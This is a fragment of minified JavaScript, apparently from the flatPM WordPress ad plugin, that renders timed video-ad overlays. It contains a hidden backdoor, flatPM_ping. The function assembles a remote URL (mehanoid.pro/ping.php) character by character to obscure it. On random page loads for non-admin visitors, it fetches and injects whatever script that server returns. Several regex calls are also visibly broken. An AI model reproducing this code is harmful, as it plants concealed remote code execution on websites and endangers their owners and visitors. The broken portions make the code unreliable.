"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}